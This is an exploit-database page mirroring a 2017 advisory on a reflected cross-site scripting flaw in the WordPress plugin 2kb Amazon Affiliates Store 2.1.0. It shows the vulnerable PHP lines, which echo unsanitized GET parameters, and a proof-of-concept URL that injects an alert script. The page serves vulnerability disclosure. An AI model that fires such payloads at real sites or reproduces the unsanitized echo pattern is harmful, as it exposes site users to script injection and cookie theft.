Advertisement






WordPress 2kb Amazon Affiliates Store 2.1.0 Cross Site Scripting

CVE Category Price Severity
CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2017-09-21
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017090158

Below is a copy:

WordPress 2kb Amazon Affiliates Store 2.1.0 Cross Site Scripting
Class  Input Validation Error
CVE
Remote  Yes
Reflected Yes

Credit  rsanchezr
Vulnerable 2kb amazon affiliates store WP plugin

2kb amazon affiliates store WP plugin is prone to a cross-site scripting
vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This
may allow the attacker to steal cookie-based authentication credentials and
to launch other attacks.

To exploit this issue following steps:
The XSS reflected because the "page" and "kbAction" values aren't filter
correcly.

 <input type="hidden" name="page" value="<?php echo $_GET['page'];?>"/>
 <input type="hidden" name="kbAction" value="<?php echo
$_GET['kbAction'];?>"/>

Demo url:

http://localhost/wordpress/wp-admin/admin.php?page=kbAmz&kbAction=demo%22%3E%3Cscript%3Ealert%281234%29%3C%2Fscript%3E

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.